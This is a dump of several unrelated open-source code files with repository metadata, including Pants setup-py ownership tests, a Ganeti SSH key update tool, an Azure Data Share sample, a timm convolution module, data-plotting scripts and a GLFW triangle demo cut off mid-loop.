            ["src/python/foo/bar:bar1", "src/python/foo/bar/baz:baz1"], "src/python/foo/bar:bar1"
        )
        self.assert_owned(
            [
                "src/python/foo",
                "src/python/foo/bar:bar2",
                "src/python/foo/bar:bar-resources",
                "src/python/foo/bar/baz:baz2",
            ],
            "src/python/foo",
        )
class TestGetExportingOwner(TestSetupPyBase):
    """Tests the rule that finds the unique exported target owning a given dependency."""

    @classmethod
    def rules(cls):
        return super().rules() + [
            get_exporting_owner,
            RootRule(OwnedDependency),
        ]

    def assert_is_owner(self, owner: str, owned: str):
        """Assert that the computed ExportedTarget for `owned` is addressed by `owner`."""
        assert (
            owner
            == self.request_single_product(
                ExportedTarget,
                Params(OwnedDependency(self.tgt(owned)), create_options_bootstrapper()),
            ).target.address.reference()
        )

    def assert_error(self, owned: str, exc_cls: Type[Exception]):
        """Assert that resolving an owner for `owned` fails with exactly `exc_cls`."""
        with pytest.raises(ExecutionError) as excinfo:
            self.request_single_product(
                ExportedTarget,
                Params(OwnedDependency(self.tgt(owned)), create_options_bootstrapper()),
            )
        ex = excinfo.value
        # The engine wraps rule failures; unwrap and check the underlying type.
        assert len(ex.wrapped_exceptions) == 1
        assert type(ex.wrapped_exceptions[0]) == exc_cls

    def assert_no_owner(self, owned: str):
        self.assert_error(owned, NoOwnerError)

    def assert_ambiguous_owner(self, owned: str):
        self.assert_error(owned, AmbiguousOwnerError)

    def test_get_owner_simple(self) -> None:
        # baz2 is reachable from both foo1 and foo3 -> ambiguous;
        # foo2 has no exported ancestor that depends on it -> no owner.
        self.create_file(
            "src/python/foo/bar/baz/BUILD",
            textwrap.dedent(
                """
                python_library(name='baz1', sources=[])
                python_library(name='baz2', sources=[])
                """
            ),
        )
        self.create_file(
            "src/python/foo/bar/BUILD",
            textwrap.dedent(
                """
                python_library(
                    name='bar1',
                    sources=[],
                    dependencies=['src/python/foo/bar/baz:baz1'],
                    provides=setup_py(name='bar1', version='1.1.1'),
                )
                python_library(
                    name='bar2',
                    sources=[],
                    dependencies=[':bar-resources', 'src/python/foo/bar/baz:baz2'],
                )
                resources(name='bar-resources', sources=[])
                """
            ),
        )
        self.create_file(
            "src/python/foo/BUILD",
            textwrap.dedent(
                """
                python_library(
                    name='foo1',
                    sources=[],
                    dependencies=['src/python/foo/bar/baz:baz2'],
                    provides=setup_py(name='foo1', version='0.1.2'),
                )
                python_library(name='foo2', sources=[])
                python_library(
                    name='foo3',
                    sources=[],
                    dependencies=['src/python/foo/bar:bar2'],
                    provides=setup_py(name='foo3', version='3.4.5'),
                )
                """
            ),
        )
        self.assert_is_owner("src/python/foo/bar:bar1", "src/python/foo/bar:bar1")
        self.assert_is_owner("src/python/foo/bar:bar1", "src/python/foo/bar/baz:baz1")
        self.assert_is_owner("src/python/foo:foo1", "src/python/foo:foo1")
        self.assert_is_owner("src/python/foo:foo3", "src/python/foo:foo3")
        self.assert_is_owner("src/python/foo:foo3", "src/python/foo/bar:bar2")
        self.assert_is_owner("src/python/foo:foo3", "src/python/foo/bar:bar-resources")
        self.assert_no_owner("src/python/foo:foo2")
        self.assert_ambiguous_owner("src/python/foo/bar/baz:baz2")

    def test_get_owner_siblings(self) -> None:
        # An exported target in the same BUILD file can own its siblings.
        self.create_file(
            "src/python/siblings/BUILD",
            textwrap.dedent(
                """
                python_library(name='sibling1', sources=[])
                python_library(
                    name='sibling2',
                    sources=[],
                    dependencies=['src/python/siblings:sibling1'],
                    provides=setup_py(name='siblings', version='2.2.2'),
                )
                """
            ),
        )
        self.assert_is_owner("src/python/siblings:sibling2", "src/python/siblings:sibling1")
        self.assert_is_owner("src/python/siblings:sibling2", "src/python/siblings:sibling2")

    def test_get_owner_not_an_ancestor(self) -> None:
        # A dependee that is not a spec-path ancestor cannot own the dependency.
        self.create_file(
            "src/python/notanancestor/aaa/BUILD",
            textwrap.dedent(
                """
                python_library(name='aaa', sources=[])
                """
            ),
        )
        self.create_file(
            "src/python/notanancestor/bbb/BUILD",
            textwrap.dedent(
                """
                python_library(
                    name='bbb',
                    sources=[],
                    dependencies=['src/python/notanancestor/aaa'],
                    provides=setup_py(name='bbb', version='11.22.33'),
                )
                """
            ),
        )
        self.assert_no_owner("src/python/notanancestor/aaa")
        self.assert_is_owner("src/python/notanancestor/bbb", "src/python/notanancestor/bbb")

    def test_get_owner_multiple_ancestor_generations(self) -> None:
        # When several exported ancestors could own ccc, the closest one wins.
        self.create_file(
            "src/python/aaa/bbb/ccc/BUILD",
            textwrap.dedent(
                """
                python_library(name='ccc', sources=[])
                """
            ),
        )
        self.create_file(
            "src/python/aaa/bbb/BUILD",
            textwrap.dedent(
                """
                python_library(
                    name='bbb',
                    sources=[],
                    dependencies=['src/python/aaa/bbb/ccc'],
                    provides=setup_py(name='bbb', version='1.1.1'),
                )
                """
            ),
        )
        self.create_file(
            "src/python/aaa/BUILD",
            textwrap.dedent(
                """
                python_library(
                    name='aaa',
                    sources=[],
                    dependencies=['src/python/aaa/bbb/ccc'],
                    provides=setup_py(name='aaa', version='2.2.2'),
                )
                """
            ),
        )
        self.assert_is_owner("src/python/aaa/bbb", "src/python/aaa/bbb/ccc")
        self.assert_is_owner("src/python/aaa/bbb", "src/python/aaa/bbb")
        self.assert_is_owner("src/python/aaa", "src/python/aaa")
def test_validate_args() -> None:
    """Check that forbidden setup.py args are rejected and benign ones accepted."""
    # "upload" and any dist-dir override are disallowed.
    with pytest.raises(InvalidSetupPyArgs):
        validate_args(("bdist_wheel", "upload"))
    with pytest.raises(InvalidSetupPyArgs):
        validate_args(("sdist", "-d", "new_distdir/"))
    with pytest.raises(InvalidSetupPyArgs):
        validate_args(("--dist-dir", "new_distdir/", "sdist"))

    # Plain commands and unrelated flags pass without raising.
    validate_args(("sdist",))
    validate_args(("bdist_wheel", "--foo"))
|
[
"noreply@github.com"
] |
noreply@github.com
|
48d78e65acb643608b7d9a129ff13c6c9954b465
|
c15a50057951317728f4eaa1854904b53161c19e
|
/FM_FTRL/ftrl_utils/params.py
|
1b77ef869aa96fceab4d0c0f42338693acfd1c7b
|
[] |
no_license
|
marvinxu-free/talking_data
|
8ca3ecab5ed5585fd0db46cebd27148e71495d2a
|
1549fe13dc9489255c3c87dd6c13a65a1176ea07
|
refs/heads/master
| 2020-03-16T05:41:15.437712
| 2018-05-10T02:56:27
| 2018-05-10T02:56:27
| 132,538,041
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 666
|
py
|
# -*- coding: utf-8 -*-
# Project: ml_more_algorithm
# Author: chaoxu create this file
# Time: 2018/4/16
# Company : Maxent
# Email: chao.xu@maxent-inc.com
"""Path and hyper-parameter constants shared by the FM/FTRL pipeline."""
import os

# Directory containing this module; data paths are resolved relative to it.
module_path = os.path.split(os.path.realpath(__file__))[0]
# ../../input relative to this file holds all datasets.
Data_path = os.path.realpath("{0}/../../input".format(module_path))
train_file = '{0}/train_new_subsample.csv'.format(Data_path)
train_file_tmp = '{0}/train_subsample_tmp.csv'.format(Data_path)
test_file = '{0}/test.csv'.format(Data_path)
test_file_tmp = '{0}/test_tmp.csv'.format(Data_path)
predict_report_file = '{0}/predict.csv'.format(Data_path)
best_weights_file = '{0}/best.hdf5'.format(Data_path)
# Rows processed per chunk when streaming the CSVs.
batchsize = 10000000
# Size of the hashed feature space (2**20 buckets).
D = 2 ** 20
|
[
"chao.xu@maxent-inc.com"
] |
chao.xu@maxent-inc.com
|
3144ecf342e1c38eb5c4bcf21135c183e9157eee
|
f576f0ea3725d54bd2551883901b25b863fe6688
|
/sdk/datashare/azure-mgmt-datashare/generated_samples/provider_share_subscriptions_adjust.py
|
496c049f7baa29e25e02b0ee6f7ed8ffa89deaa0
|
[
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] |
permissive
|
Azure/azure-sdk-for-python
|
02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c
|
c2ca191e736bb06bfbbbc9493e8325763ba990bb
|
refs/heads/main
| 2023-09-06T09:30:13.135012
| 2023-09-06T01:08:06
| 2023-09-06T01:08:06
| 4,127,088
| 4,046
| 2,755
|
MIT
| 2023-09-14T21:48:49
| 2012-04-24T16:46:12
|
Python
|
UTF-8
|
Python
| false
| false
| 1,824
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.datashare import DataShareManagementClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-datashare
# USAGE
python provider_share_subscriptions_adjust.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
    """Adjust the expiration date of a provider share subscription.

    NOTE(review): DefaultAzureCredential reads AZURE_CLIENT_ID,
    AZURE_TENANT_ID and AZURE_CLIENT_SECRET from the environment; the
    subscription/resource identifiers below are sample placeholders.
    """
    client = DataShareManagementClient(
        credential=DefaultAzureCredential(),
        subscription_id="12345678-1234-1234-12345678abc",
    )

    response = client.provider_share_subscriptions.adjust(
        resource_group_name="SampleResourceGroup",
        account_name="Account1",
        share_name="Share1",
        provider_share_subscription_id="4256e2cf-0f82-4865-961b-12f83333f487",
        provider_share_subscription={"properties": {"expirationDate": "2020-12-26T22:33:24.5785265Z"}},
    )
    print(response)


# x-ms-original-file: specification/datashare/resource-manager/Microsoft.DataShare/stable/2020-09-01/examples/ProviderShareSubscriptions_Adjust.json
if __name__ == "__main__":
    main()
|
[
"noreply@github.com"
] |
noreply@github.com
|
13319f9028ad09f1d990efba329a3d5162550bb6
|
2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02
|
/PyTorch/dev/cv/image_classification/CSPResNeXt-50_ID1888_for_PyTorch/timm/models/layers/separable_conv.py
|
340f58362031b648a0361ac28d85bde369834876
|
[
"LicenseRef-scancode-proprietary-license",
"LGPL-2.0-or-later",
"Apache-2.0",
"GPL-1.0-or-later",
"BSD-3-Clause",
"MIT",
"CC-BY-NC-4.0",
"BSD-2-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Ascend/ModelZoo-PyTorch
|
4c89414b9e2582cef9926d4670108a090c839d2d
|
92acc188d3a0f634de58463b6676e70df83ef808
|
refs/heads/master
| 2023-07-19T12:40:00.512853
| 2023-07-17T02:48:18
| 2023-07-17T02:48:18
| 483,502,469
| 23
| 6
|
Apache-2.0
| 2022-10-15T09:29:12
| 2022-04-20T04:11:18
|
Python
|
UTF-8
|
Python
| false
| false
| 4,530
|
py
|
#
# BSD 3-Clause License
#
# Copyright (c) 2017 xxxx
# All rights reserved.
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ============================================================================
#
""" Depthwise Separable Conv Modules
Basic DWS convs. Other variations of DWS exist with batch norm or activations between the
DW and PW convs such as the Depthwise modules in MobileNetV2 / EfficientNet and Xception.
Hacked together by / Copyright 2020 Ross Wightman
"""
from torch import nn as nn
from .create_conv2d import create_conv2d
from .create_norm_act import convert_norm_act
import torch.npu
import os

# Select the Ascend NPU device from the NPU_CALCULATE_DEVICE environment
# variable; falls back to device 0 when unset or not a plain digit string.
NPU_CALCULATE_DEVICE = 0
if os.getenv('NPU_CALCULATE_DEVICE') and str.isdigit(os.getenv('NPU_CALCULATE_DEVICE')):
    NPU_CALCULATE_DEVICE = int(os.getenv('NPU_CALCULATE_DEVICE'))
if torch.npu.current_device() != NPU_CALCULATE_DEVICE:
    torch.npu.set_device(f'npu:{NPU_CALCULATE_DEVICE}')
class SeparableConvBnAct(nn.Module):
    """ Separable Conv w/ trailing Norm and Activation

    Depthwise conv followed by a pointwise (1x1) conv, then a fused
    norm+activation layer built via convert_norm_act.
    """
    def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, padding='', bias=False,
                 channel_multiplier=1.0, pw_kernel_size=1, norm_layer=nn.BatchNorm2d, act_layer=nn.ReLU,
                 apply_act=True, drop_block=None):
        super(SeparableConvBnAct, self).__init__()

        # Depthwise conv; channel_multiplier scales the intermediate width.
        self.conv_dw = create_conv2d(
            in_channels, int(in_channels * channel_multiplier), kernel_size,
            stride=stride, dilation=dilation, padding=padding, depthwise=True)

        # Pointwise conv mixes channels up to out_channels.
        self.conv_pw = create_conv2d(
            int(in_channels * channel_multiplier), out_channels, pw_kernel_size, padding=padding, bias=bias)

        norm_act_layer = convert_norm_act(norm_layer, act_layer)
        self.bn = norm_act_layer(out_channels, apply_act=apply_act, drop_block=drop_block)

    @property
    def in_channels(self):
        # Mirrors nn.Conv2d's attribute for drop-in compatibility.
        return self.conv_dw.in_channels

    @property
    def out_channels(self):
        return self.conv_pw.out_channels

    def forward(self, x):
        x = self.conv_dw(x)
        x = self.conv_pw(x)
        if self.bn is not None:
            x = self.bn(x)
        return x
class SeparableConv2d(nn.Module):
    """ Separable Conv

    Depthwise conv followed by a pointwise (1x1) conv, with no norm or
    activation between or after (see SeparableConvBnAct for that variant).
    """
    def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, dilation=1, padding='', bias=False,
                 channel_multiplier=1.0, pw_kernel_size=1):
        super(SeparableConv2d, self).__init__()

        # Depthwise conv; channel_multiplier scales the intermediate width.
        self.conv_dw = create_conv2d(
            in_channels, int(in_channels * channel_multiplier), kernel_size,
            stride=stride, dilation=dilation, padding=padding, depthwise=True)

        # Pointwise conv mixes channels up to out_channels.
        self.conv_pw = create_conv2d(
            int(in_channels * channel_multiplier), out_channels, pw_kernel_size, padding=padding, bias=bias)

    @property
    def in_channels(self):
        # Mirrors nn.Conv2d's attribute for drop-in compatibility.
        return self.conv_dw.in_channels

    @property
    def out_channels(self):
        return self.conv_pw.out_channels

    def forward(self, x):
        x = self.conv_dw(x)
        x = self.conv_pw(x)
        return x
|
[
"wangjiangben@huawei.com"
] |
wangjiangben@huawei.com
|
cd6ab3e5c6e2b23fd99f849a3780802dacbeb28a
|
e9c119c3da03b4347456091cc439aaedb07a4bdf
|
/python work week 9 question 2.py
|
576f46d5c72e8ca358a6752ef261406819195dd4
|
[] |
no_license
|
infinityman8/week9-12-logbook
|
da8b1e5942f36b006f3e6bfc0b713623d862f247
|
4de033f3fcb0b69984a1ba0f4a0a654c386c4ec1
|
refs/heads/master
| 2020-04-07T13:52:27.005786
| 2018-12-04T17:44:12
| 2018-12-04T17:44:12
| 158,425,236
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 144
|
py
|
def main():
    # Demo driver: prints the result of mystery(5, 7), i.e. their average 6.0.
    a=5
    b=7
    print(mystery(a,b))
def mystery(x, y):
    """Return the arithmetic mean of x and y as a float."""
    total = x + y
    return total / 2.0
main()
|
[
"noreply@github.com"
] |
noreply@github.com
|
8b8c7653fa04c56d1f7f07d4dfa5f5737209c3b7
|
c9a34a7036865101d05065fe47e86c8b173d0b93
|
/test.py
|
fbe90e2d911fe9a2612c4329bca87b6036e73644
|
[] |
no_license
|
Pablocg0/Proyecto_ia
|
7f4e810a5b3cffe586609527d4f2c1367c0ee096
|
5f8ffa56f5e4c7b8adbe098b81599fa7fddbb7ae
|
refs/heads/master
| 2020-09-06T18:10:44.894310
| 2019-11-09T05:54:18
| 2019-11-09T05:54:18
| 220,504,872
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 157
|
py
|
import pandas as pd

# Draw 10 random words from column "a" of the dictionary CSV and save them
# (one per line, no header index) for the game to consume.
diccionario = pd.read_csv("dick_1.csv")
palabra = diccionario["a"].sample(n=10)
palabra.to_csv("dick.csv",encoding='utf-8',index=False)
|
[
"pablocg064@gmail.com"
] |
pablocg064@gmail.com
|
288a244c7b7b0c75beeca7844880dcf05b568272
|
ab41cbae15cbbaac52ec7db5da568b337d232bf6
|
/lib/tools/ssh_update.py
|
f9d1b6db3f56e7fcd50aa5b66a06fbe27614fb08
|
[
"BSD-2-Clause"
] |
permissive
|
skycover/ganeti-2.15.2
|
9d6eef72cd1c7942c7b293c4bcc4c0b62f880e9f
|
db69c3917c1ae00f31943c52c147c7938ce64d9c
|
refs/heads/master
| 2021-01-24T13:24:02.294516
| 2018-02-27T18:52:36
| 2018-02-27T18:52:36
| 123,173,553
| 0
| 0
| null | 2018-02-27T18:53:46
| 2018-02-27T18:53:46
| null |
UTF-8
|
Python
| false
| false
| 7,218
|
py
|
#
#
# Copyright (C) 2014 Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Script to update a node's SSH key files.
This script is used to update the node's 'authorized_keys' and
'ganeti_pub_key' files. It will be called via SSH from the master
node.
"""
import os
import os.path
import optparse
import sys
import logging
from ganeti import cli
from ganeti import constants
from ganeti import errors
from ganeti import utils
from ganeti import ht
from ganeti import ssh
from ganeti import pathutils
from ganeti.tools import common
# Schema validator for the JSON document read from stdin: each SSH key entry
# pairs an action (from SSHS_ACTIONS) with a node-name -> key-list mapping.
_DATA_CHECK = ht.TStrictDict(False, True, {
  constants.SSHS_CLUSTER_NAME: ht.TNonEmptyString,
  constants.SSHS_NODE_DAEMON_CERTIFICATE: ht.TNonEmptyString,
  constants.SSHS_SSH_PUBLIC_KEYS:
    ht.TItems(
      [ht.TElemOf(constants.SSHS_ACTIONS),
       ht.TDictOf(ht.TNonEmptyString, ht.TListOf(ht.TNonEmptyString))]),
  constants.SSHS_SSH_AUTHORIZED_KEYS:
    ht.TItems(
      [ht.TElemOf(constants.SSHS_ACTIONS),
       ht.TDictOf(ht.TNonEmptyString, ht.TListOf(ht.TNonEmptyString))]),
  constants.SSHS_GENERATE: ht.TDictOf(ht.TNonEmptyString, ht.TString),
  })
class SshUpdateError(errors.GenericError):
  """Local class for reporting errors.

  Raised for any failure while validating input or updating SSH key files.

  """
def ParseOptions():
  """Parses the options passed to the program.

  Recognizes --debug, --verbose and --dry-run; any positional arguments
  are rejected by common.VerifyOptions.

  @return: Options and arguments

  """
  program = os.path.basename(sys.argv[0])

  parser = optparse.OptionParser(
    usage="%prog [--dry-run] [--verbose] [--debug]", prog=program)
  parser.add_option(cli.DEBUG_OPT)
  parser.add_option(cli.VERBOSE_OPT)
  parser.add_option(cli.DRY_RUN_OPT)

  (opts, args) = parser.parse_args()

  return common.VerifyOptions(parser, opts, args)
def UpdateAuthorizedKeys(data, dry_run, _homedir_fn=None):
  """Updates root's C{authorized_keys} file.

  Flattens the per-node key lists from the input and either adds them to or
  removes them from the login user's authorized_keys, depending on the
  requested action. Other actions raise L{SshUpdateError}.

  @type data: dict
  @param data: Input data
  @type dry_run: boolean
  @param dry_run: Whether to perform a dry run

  """
  instructions = data.get(constants.SSHS_SSH_AUTHORIZED_KEYS)
  if not instructions:
    logging.info("No change to the authorized_keys file requested.")
    return
  (action, authorized_keys) = instructions

  (auth_keys_file, _) = \
    ssh.GetAllUserFiles(constants.SSH_LOGIN_USER, mkdir=True,
                        _homedir_fn=_homedir_fn)

  # Flatten the node -> [keys] mapping into a single key list.
  key_values = []
  for key_value in authorized_keys.values():
    key_values += key_value
  if action == constants.SSHS_ADD:
    if dry_run:
      logging.info("This is a dry run, not adding keys to %s",
                   auth_keys_file)
    else:
      if not os.path.exists(auth_keys_file):
        # Create the file with owner-only permissions before appending.
        utils.WriteFile(auth_keys_file, mode=0600, data="")
      ssh.AddAuthorizedKeys(auth_keys_file, key_values)
  elif action == constants.SSHS_REMOVE:
    if dry_run:
      logging.info("This is a dry run, not removing keys from %s",
                   auth_keys_file)
    else:
      ssh.RemoveAuthorizedKeys(auth_keys_file, key_values)
  else:
    raise SshUpdateError("Action '%s' not implemented for authorized keys."
                         % action)
def UpdatePubKeyFile(data, dry_run, key_file=pathutils.SSH_PUB_KEYS):
  """Updates the file of public SSH keys.

  Supports the OVERRIDE, ADD, REPLACE_OR_ADD, REMOVE and CLEAR actions on
  Ganeti's public key file; any other action raises L{SshUpdateError}.

  @type data: dict
  @param data: Input data
  @type dry_run: boolean
  @param dry_run: Whether to perform a dry run

  """
  instructions = data.get(constants.SSHS_SSH_PUBLIC_KEYS)
  if not instructions:
    logging.info("No instructions to modify public keys received."
                 " Not modifying the public key file at all.")
    return
  (action, public_keys) = instructions

  if action == constants.SSHS_OVERRIDE:
    if dry_run:
      logging.info("This is a dry run, not overriding %s", key_file)
    else:
      ssh.OverridePubKeyFile(public_keys, key_file=key_file)
  elif action in [constants.SSHS_ADD, constants.SSHS_REPLACE_OR_ADD]:
    if dry_run:
      logging.info("This is a dry run, not adding or replacing a key to %s",
                   key_file)
    else:
      for uuid, keys in public_keys.items():
        if action == constants.SSHS_REPLACE_OR_ADD:
          # Drop any existing keys for this node before re-adding.
          ssh.RemovePublicKey(uuid, key_file=key_file)
        for key in keys:
          ssh.AddPublicKey(uuid, key, key_file=key_file)
  elif action == constants.SSHS_REMOVE:
    if dry_run:
      logging.info("This is a dry run, not removing keys from %s", key_file)
    else:
      for uuid in public_keys.keys():
        ssh.RemovePublicKey(uuid, key_file=key_file)
  elif action == constants.SSHS_CLEAR:
    if dry_run:
      logging.info("This is a dry run, not clearing file %s", key_file)
    else:
      ssh.ClearPubKeyFile(key_file=key_file)
  else:
    raise SshUpdateError("Action '%s' not implemented for public keys."
                         % action)
def GenerateRootSshKeys(data, dry_run):
  """(Re-)generates the root SSH keys.

  Only acts when the input contains a SSHS_GENERATE section; the section's
  suffix is appended to the generated key file names.

  @type data: dict
  @param data: Input data
  @type dry_run: boolean
  @param dry_run: Whether to perform a dry run

  """
  generate_info = data.get(constants.SSHS_GENERATE)
  if generate_info:
    suffix = generate_info[constants.SSHS_SUFFIX]
    if dry_run:
      logging.info("This is a dry run, not generating any files.")
    else:
      common.GenerateRootSshKeys(SshUpdateError, _suffix=suffix)
def Main():
  """Main routine.

  Reads and validates the JSON request from stdin, then applies the
  authorized_keys, public-key-file and key-generation updates in order.

  @return: C{constants.EXIT_SUCCESS}, or a CLI error code on failure

  """
  opts = ParseOptions()

  utils.SetupToolLogging(opts.debug, opts.verbose)

  try:
    data = common.LoadData(sys.stdin.read(), _DATA_CHECK)

    # Check if input data is correct
    common.VerifyClusterName(data, SshUpdateError, constants.SSHS_CLUSTER_NAME)
    common.VerifyCertificateSoft(data, SshUpdateError)

    # Update / Generate SSH files
    UpdateAuthorizedKeys(data, opts.dry_run)
    UpdatePubKeyFile(data, opts.dry_run)
    GenerateRootSshKeys(data, opts.dry_run)

    logging.info("Setup finished successfully")
  except Exception, err: # pylint: disable=W0703
    logging.debug("Caught unhandled exception", exc_info=True)

    (retcode, message) = cli.FormatError(err)
    logging.error(message)

    return retcode
  else:
    return constants.EXIT_SUCCESS
|
[
"vs@ipatov.net"
] |
vs@ipatov.net
|
ce08b5951af442d5ac48612351d428e06a55e1e3
|
2ef93f98aef88475441e112223d127b583bc96ec
|
/tesla_ohlc.py
|
91125a3b6ff6b4d4e6ad12ce6a156a620543b75f
|
[] |
no_license
|
bluesealin/Machine-Learning
|
ba6d54ef82879f0cf5f3ef58a7bb9941d15e0e94
|
cc637c8901c384e70b7b1decac66ec4d245075c5
|
refs/heads/master
| 2021-05-03T07:42:55.966116
| 2018-01-17T17:41:05
| 2018-01-17T17:41:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,573
|
py
|
import datetime as dt
import matplotlib.pyplot as plt
from matplotlib import style
from matplotlib.finance import candlestick_ohlc
import matplotlib.dates as mdates
import pandas as pd
import pandas_datareader.data as web
style.use('ggplot')

# Plot TSLA as 10-day OHLC candlesticks with a volume subplot.
# NOTE(review): matplotlib.finance was removed in matplotlib 3.x; this
# script requires an old matplotlib (or the mplfinance replacement).

# creating the csv file (one-time download, kept for reference)
#start = dt.datetime(2000, 1, 1)
#end = dt.datetime(2016, 12, 31)
#df = web.DataReader('TSLA', 'yahoo', start, end)
#df.to_csv('tsla.csv')

# column 0 (dates) will be the index column
df = pd.read_csv('tsla.csv', parse_dates=True, index_col=0)

# moving average will take the last 100 day prices and take the average of them today, min_periods will avoid NaN
# df['100ma'] = df['Adj Close'].rolling(window=100, min_periods=0).mean()

# resample to 10-day buckets: OHLC for price, sum for volume
# OpenHighLowClose ex: 10Min, 6Min
df_ohlc = df['Adj Close'].resample('10D').ohlc()
df_volume = df['Volume'].resample('10D').sum()

# data based on 10 days
#print(df_ohlc.head())

# reset index and convert dates to mdates number so we can get the values
df_ohlc.reset_index(inplace=True)
df_ohlc['Date'] = df_ohlc['Date'].map(mdates.date2num)

# ploting w/ matplotlib and taking the values w/ pandas
# rows x columns gridsize staring
ax1 = plt.subplot2grid((6,1), (0,0), rowspan=5, colspan=1)
ax2 = plt.subplot2grid((6,1), (5,0), rowspan=1, colspan=1, sharex=ax1)
# this will display beatiful dates
ax1.xaxis_date()

candlestick_ohlc(ax1, df_ohlc.values, width=2, colorup='g')
# x = df_volume.index.map(mdates.date2num), y = df_volume.values, fill from 0 to y
ax2.fill_between(df_volume.index.map(mdates.date2num), df_volume.values, 0)
plt.show()
|
[
"lucasdraichi@gmail.com"
] |
lucasdraichi@gmail.com
|
29b750bb302001c9849c94b7e2eeb31a1216aadf
|
25a4df7d63285564159a2c9d5b48a66e767c09f9
|
/test_triangle.py
|
1ce21821c7abd08bbac558ff344f2410fb0a0767
|
[
"MIT"
] |
permissive
|
philetus/superNormal
|
c82677c81359e92f33810660fa5aa45161004a71
|
b6df64c2ef4838b8a2080fae0be57cfee40ccf7a
|
refs/heads/master
| 2020-03-20T06:07:10.998229
| 2018-06-13T16:27:41
| 2018-06-13T16:42:02
| 137,239,304
| 0
| 0
| null | 2018-06-13T16:05:38
| 2018-06-13T16:05:38
| null |
UTF-8
|
Python
| false
| false
| 1,406
|
py
|
import glfw
import OpenGL.GL as gl
def main():
    """Open a GLFW window and render a colored triangle until the window closes."""
    # Initialize the library
    if not glfw.init():
        return
    # Create a windowed mode window and its OpenGL context
    window = glfw.create_window(640, 480, "Hello World", None, None)
    if not window:
        glfw.terminate()
        return

    # Make the window's context current
    glfw.make_context_current(window)

    # Loop until the user closes the window
    while not glfw.window_should_close(window):
        # Render here, e.g. using pyOpenGL
        width, height = glfw.get_framebuffer_size(window)
        ratio = width / float(height)
        gl.glViewport(0, 0, width, height)
        gl.glClear(gl.GL_COLOR_BUFFER_BIT)
        # Orthographic projection that preserves the window's aspect ratio.
        gl.glMatrixMode(gl.GL_PROJECTION)
        gl.glLoadIdentity()
        gl.glOrtho(-ratio, ratio, -1, 1, 1, -1)
        gl.glMatrixMode(gl.GL_MODELVIEW)
        gl.glLoadIdentity()
        # gl.glRotatef(glfw.glfwGetTime() * 50, 0, 0, 1)
        # Immediate-mode triangle with one red, one green, one blue vertex.
